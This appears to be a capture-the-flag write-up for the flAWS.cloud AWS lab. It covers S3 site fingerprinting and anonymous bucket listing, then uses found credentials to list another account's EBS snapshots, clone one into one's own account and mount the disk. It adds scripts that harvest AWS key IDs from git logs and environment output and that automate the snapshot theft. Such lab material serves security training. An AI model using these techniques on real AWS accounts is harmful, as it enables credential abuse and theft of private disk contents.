# Enumeration

A quick tell that a site is served from S3: resolve the domain to an IP, reverse-resolve that IP, and check whether the resulting name contains the word "website" (S3 static-website endpoints are named `s3-website-<region>.amazonaws.com`).

You can access the static website at `flaws.cloud.s3-website-us-west-2.amazonaws.com`, or the bucket itself (the S3 REST endpoint, which answers API requests such as listings) at `flaws.cloud.s3-us-west-2.amazonaws.com`.

If you try to access a bucket through an endpoint for a different region (for example, the bucket lives in `us-west-2` but you request `bucket.s3.eu-west-1.amazonaws.com`), S3 will not serve it there: you are either redirected or handed a `PermanentRedirect` error whose body names the endpoint you should have used. Either way, the response tells you which region the bucket is in.

To test whether a website is hosted in an S3 bucket, first resolve it (if your resolver refuses `any` queries, ask for `a` records instead):

```
dig +nocmd flaws.cloud any +multiline +noall +answer
```

![get IP address](https://1508177803-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LSy0aAo8OKT4I-Ahftv%2F-MbRr5ZAB0-6hCPGmnP8%2F-MbRrxzalmQgxb99Mk08%2Fimage.png?alt=media\&token=11a5eb72-318d-46bb-81b9-e3ca040cc792)

Put the IP in a browser. The request carries no bucket name, so S3 cannot tell which site you want and redirects you to AWS's generic S3 page, which is already a strong hint that the address belongs to S3.

Run `nslookup` (or `dig -x`) on the IP to get its reverse name. It comes back as `s3-website-us-west-2.amazonaws.com`, which confirms both that this is an S3 website endpoint and that the bucket is in `us-west-2`.

![](https://1508177803-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LSy0aAo8OKT4I-Ahftv%2F-MbRsD5DECUeId3AeP69%2F-MbRtHKgMqQJM3ohTYwg%2Fimage.png?alt=media\&token=a03fb612-60a1-43bc-810d-592ff92ce1d6)
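The resolve-then-reverse-resolve check above as a small script, added here as an example (it is not code from the original page or from flAWS). It assumes `dig` is installed; the hostname classification is pure string handling, and the PTR names used to illustrate it are constructed.

```shell
#!/bin/sh
# Added example, not from the original page: automate the check above.
# Resolve a hostname, reverse-resolve each A record, and look for the
# S3 website marker in the PTR name. Only check_s3_host touches the
# network (it needs dig); classify_s3_rdns is pure string handling.

# Classify one reverse-DNS name (trailing dot and case are ignored).
# Prints "website <region>" for an S3 static-website endpoint,
# "s3-endpoint" for any other S3 name, and "none" otherwise.
classify_s3_rdns() {
    name=$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]' | sed 's/\.$//')
    case "$name" in
        s3-website[-.]*.amazonaws.com)
            # s3-website-us-west-2.amazonaws.com or s3-website.eu-west-2.amazonaws.com
            printf 'website %s\n' "$(printf '%s' "$name" | sed 's/^s3-website[-.]//; s/\.amazonaws\.com$//')"
            ;;
        s3[-.]*.amazonaws.com)
            printf 's3-endpoint\n'
            ;;
        *)
            printf 'none\n'
            ;;
    esac
}

# Resolve a hostname and report what each address reverse-resolves to.
# Returns 0 if at least one address belongs to an S3 endpoint.
check_s3_host() {
    found=1
    for ip in $(dig +short "$1" A); do
        # dig +short also prints CNAME targets; keep only IPv4 literals
        case "$ip" in *[!0-9.]*) continue ;; esac
        for ptr in $(dig +short -x "$ip"); do
            kind=$(classify_s3_rdns "$ptr")
            printf '%s -> %s [%s]\n' "$ip" "$ptr" "$kind"
            [ "$kind" != none ] && found=0
        done
    done
    return "$found"
}

# Usage: sh s3check.sh flaws.cloud
[ $# -eq 0 ] || check_s3_host "$1"
```

The classification is the useful part for automation: a `website <region>` result tells you which regional endpoint (`<bucket>.s3-website-<region>.amazonaws.com`) to try next, with the bucket name guessed as the site's domain. Reverse DNS can be missing or stale for some address ranges, so treat `none` as "not proven", not as "not S3".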

{% hint style="success" %}
The site `flaws.cloud` is hosted as an S3 bucket. This is a common way to host a static site, similar to hosting one via GitHub Pages. Some interesting facts about S3 hosting: when a custom domain points at an S3 website endpoint, the bucket name (`flaws.cloud`) must match the domain name (`flaws.cloud`). Also, S3 bucket names are a global namespace, meaning two accounts cannot have buckets with the same name. The result is that you could create a bucket named `apple.com` and Apple would never be able to host their main site via S3 hosting under that name. From the enumeration side it also means a bucket name is guessable from the domain, and a name either exists or it does not.
{% endhint %}

### Check for common s3 bucket misconfigurations

```
/bucketflaws.sh -u flaws.cloud -o -p -d
```

![](https://1508177803-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LSy0aAo8OKT4I-Ahftv%2F-MbRtTA7H7ySpG8BAWpN%2F-MbSn5q_GK6p3fp66UKN%2Fimage.png?alt=media\&token=85d24d9d-7e28-4b4e-a9a2-b8f93703fa25)

With the AWS CLI, an unsigned request (`--no-sign-request`, i.e. anonymous, no credentials at all) tests whether the bucket grants List permission to everyone:

```
aws s3 ls s3://flaws.cloud/ --no-sign-request --region us-west-2
```

If the command succeeds it lists the files in the bucket. An `AccessDenied` error only means anonymous listing is off; individual objects may still be readable if you know their names.

You can also list the files in a browser through the bucket's REST endpoint, <http://flaws.cloud.s3.amazonaws.com/>, which returns the listing as XML.

![S3 bucket with "Everyone" having "List" permissions](https://1508177803-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LSy0aAo8OKT4I-Ahftv%2F-MbRtTA7H7ySpG8BAWpN%2F-MbT0-JjJd7RiWoDGhDp%2Fimage.png?alt=media\&token=7ad77615-bcc5-4683-8f21-e65bef4d2ae6)

### Different Types of Access Keys

`AKIAJ366LIPB4IJKT7SA` = long-term access key belonging to an IAM user; note the **AKIA** prefix. It is used together with its secret access key and does not expire on its own.

`ASIAJ366LIJGULDN21D` = temporary (session) credential issued by STS, for example from an assumed role or an instance profile; note the **ASIA** prefix. It only works together with its session token, and it expires.
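An added example (not from the original page): a scanner that pulls access key IDs out of a text dump and reports, by prefix, what each one is and what else you need in order to use it. The sample dump and every key ID in it are constructed; the `AKIA`/`ASIA` (and `AROA`/`AIDA`) prefixes are AWS's documented identifier prefixes.

```shell
#!/bin/sh
# Added example, not from the original page: pull AWS access key IDs out
# of a text dump (git history, shell history, .env files, config) and say
# what kind of credential each one is. The sample dump is constructed and
# every key in it is made up.

# Prefix -> what the identifier is. Only AKIA and ASIA are usable
# credentials; the others are IAM resource IDs you may also see in dumps.
aws_key_kind() {
    case "$1" in
        AKIA*) printf 'long-term IAM user key: needs the matching secret access key\n' ;;
        ASIA*) printf 'temporary STS key: needs secret key AND session token, and expires\n' ;;
        AROA*) printf 'IAM role unique ID (not a credential)\n' ;;
        AIDA*) printf 'IAM user unique ID (not a credential)\n' ;;
        *)     printf 'unknown\n' ;;
    esac
}

# Read text on stdin and print "KEYID<TAB>kind" for each distinct access
# key ID. A real key ID is exactly 20 characters (4-letter prefix plus 16
# upper-case alphanumerics), so candidates must sit at word boundaries at
# that length; fragments like AKIATOOSHORT are skipped. LC_ALL=C keeps the
# [A-Z] ranges strictly ASCII upper-case whatever the user's locale is.
scan_aws_keys() {
    LC_ALL=C grep -oE '(^|[^A-Z0-9])(AKIA|ASIA)[A-Z0-9]{16}([^A-Z0-9]|$)' \
        | LC_ALL=C grep -oE '(AKIA|ASIA)[A-Z0-9]{16}' \
        | sort -u \
        | while read -r key; do
            printf '%s\t%s\n' "$key" "$(aws_key_kind "$key")"
          done
}

# Constructed sample dump (looks like a leaked credentials file plus a
# shell profile); none of the IDs or secrets are real.
SAMPLE_DUMP='[default]
aws_access_key_id = AKIAEXAMPLE12345ABCD
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
export AWS_ACCESS_KEY_ID=ASIAEXAMPLE98765ZYXW
export AWS_SESSION_TOKEN=FwoGZXIvYXdzEXAMPLE
role_id = AROAEXAMPLE11111AAAA
comment: AKIATOOSHORT is not a key, and AKIAEXAMPLE12345ABCD appears twice'

# Run the scanner over the constructed dump (two distinct keys expected).
scan_sample() {
    printf '%s\n' "$SAMPLE_DUMP" | scan_aws_keys
}
```

Pipe anything through it: `git log -p | scan_aws_keys`, or `env | scan_aws_keys`. For an `ASIA` hit, put the matching `aws_session_token` into the profile as well, otherwise every call fails with an invalid-token error. `aws sts get-caller-identity --profile <name>` is the quickest way to confirm a key still works and to learn which account and principal it belongs to.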

### Get Snapshots

AWS lets you take snapshots of EC2 volumes (EBS) and of databases (RDS). The main purpose is backup copies, but people also use snapshots to regain access to their own EC2 instances when they have lost the password or key: snapshot the volume, build a new volume from it, and mount that on an instance you control.

{% hint style="success" %}
What helps an owner helps an attacker. Snapshots are normally limited to the owning account, but they can be shared with specific accounts or made public, and anyone with the right EC2 permissions in the account can create them. So a realistic attack is: obtain an AWS key that allows EC2 actions (start/stop, snapshot, create volume), snapshot a running instance's volume, then build a volume from that snapshot and attach it to an instance the attacker controls, in your environment or in theirs. Nothing on the copied disk is protected by the original instance's logins. As with all backups, snapshots need the same protection as the systems they were taken from, including control over who they are shared with.
{% endhint %}

Look for snapshots that this user has access to (note the `SnapshotId`):

{% hint style="info" %}
Remember to include the owner filter (the documented option is `--owner-ids`; the CLI also accepts the shortened `--owner-id` used below). Without it, `describe-snapshots` returns every snapshot that is public or shared with you, which is a huge amount of irrelevant output.
{% endhint %}

```
aws ec2 describe-snapshots --profile flaws3 --owner-id 975426262029 --region us-west-2
```

![get SnapshotId](https://1508177803-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LSy0aAo8OKT4I-Ahftv%2F-MbVWEgw3pFEVDuXINW5%2F-MbVbutRXtpLaoCrPU-d%2Fimage.png?alt=media\&token=672c63bd-dd60-421c-bb6a-22ca997b5db0)

Create a volume from that snapshot. Note the profile switch: the snapshot was found with the `flaws3` credentials, but the volume is created under your own `default` profile, in your own account, which only works because the snapshot is shared beyond its owning account. The volume must be in the availability zone where you will run the instance that mounts it:

```
aws ec2 create-volume --profile default --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
```

![launch an ec2 instance and attach the volume](https://1508177803-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LSy0aAo8OKT4I-Ahftv%2F-MbVcBh3P1oVMJ0zwMrU%2F-MbWE8EsOydh0VDRM7qw%2Fimage.png?alt=media\&token=ae73ab3c-23c2-4308-91e8-97ebaecbda57)

Launch an EC2 instance in the same availability zone (`us-west-2a`), attach the volume to it, then run `lsblk` on the instance to confirm the new disk is present. A volume attached as `/dev/sdf` shows up as `xvdf` on Xen-based instances and as `nvme1n1` on Nitro-based ones.

![](https://1508177803-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LSy0aAo8OKT4I-Ahftv%2F-MbVcBh3P1oVMJ0zwMrU%2F-MbWETyEXJuPoU4yCk9q%2Fimage.png?alt=media\&token=ee63d628-ae3d-44c7-9883-5152b81425b5)

Then mount the data partition and browse it: `sudo mount /dev/xvdf1 /mnt`, then look around `/mnt` to read the snapshot's file system. Add `-o ro` to mount it read-only, which is worth doing when the copy is evidence you do not want to alter. Note that none of the instance's own logins or passwords were needed: whoever can read the snapshot can read the disk.
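The snapshot-to-volume-to-mount chain above wrapped in shell functions, added here as an example (not code from the original page). It assumes the AWS CLI and permissions for the `ec2` calls it makes; the profile names, account ID, zone and snapshot ID in the usage comment are taken from the page, the instance ID there is made up, and the `lsblk` lines used to exercise `first_partition` are constructed.

```shell
#!/bin/sh
# Added example, not from the original page: the snapshot-to-volume steps
# above as reusable shell functions. Profile names, account ID, zone,
# snapshot and instance IDs are placeholders you pass in; nothing calls
# the AWS CLI until you invoke list_snapshots or clone_and_attach.

# Region from an availability-zone name: us-west-2a -> us-west-2.
az_to_region() {
    printf '%s\n' "$1" | sed 's/[a-z]$//'
}

# Snapshots owned by one account that the given profile can see.
# $1 profile, $2 owner account ID, $3 region.
list_snapshots() {
    aws ec2 describe-snapshots --profile "$1" --region "$3" --owner-ids "$2" \
        --query 'Snapshots[].[SnapshotId,VolumeSize,StartTime,Description]' \
        --output text
}

# Build a volume from the snapshot in your own account and attach it to an
# instance you already run in that zone; prints the new volume ID.
# $1 your profile, $2 availability zone of the instance, $3 snapshot ID,
# $4 instance ID. The attach device is /dev/sdf; on the instance it shows
# up as /dev/xvdf (Xen) or /dev/nvme1n1 (Nitro).
clone_and_attach() {
    profile=$1; az=$2; snap=$3; instance=$4
    region=$(az_to_region "$az")
    vol=$(aws ec2 create-volume --profile "$profile" --region "$region" \
        --availability-zone "$az" --snapshot-id "$snap" \
        --query VolumeId --output text)
    # attach-volume fails while the volume is still "creating"
    aws ec2 wait volume-available --profile "$profile" --region "$region" --volume-ids "$vol"
    aws ec2 attach-volume --profile "$profile" --region "$region" \
        --volume-id "$vol" --instance-id "$instance" --device /dev/sdf >/dev/null
    # the device node only appears on the instance once the attachment is in-use
    aws ec2 wait volume-in-use --profile "$profile" --region "$region" --volume-ids "$vol"
    printf '%s\n' "$vol"
}

# On the instance: feed it `lsblk -ln -o NAME,TYPE` and a disk name; prints
# the first partition on that disk (/dev/xvdf1, /dev/nvme1n1p1), or nothing
# if the disk has no partition table (then mount the disk itself).
first_partition() {
    awk -v disk="$1" '$2 == "part" && index($1, disk) == 1 { print "/dev/" $1; exit }'
}

# Example run (IDs from the page; the instance ID is a placeholder):
#   list_snapshots flaws3 975426262029 us-west-2
#   vol=$(clone_and_attach default us-west-2a snap-0b49342abd1bdcb89 i-0123456789abcdef0)
#   # then on the instance:
#   part=$(lsblk -ln -o NAME,TYPE | first_partition xvdf)
#   sudo mount -o ro,noexec "$part" /mnt
```

The `wait` calls are what make the sequence reliable rather than racy. Mounting with `-o ro,noexec` keeps the copy unmodified and stops anything on it from running, which is what you want both as an investigator and because a change to the copy is a change that can be attributed to you.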
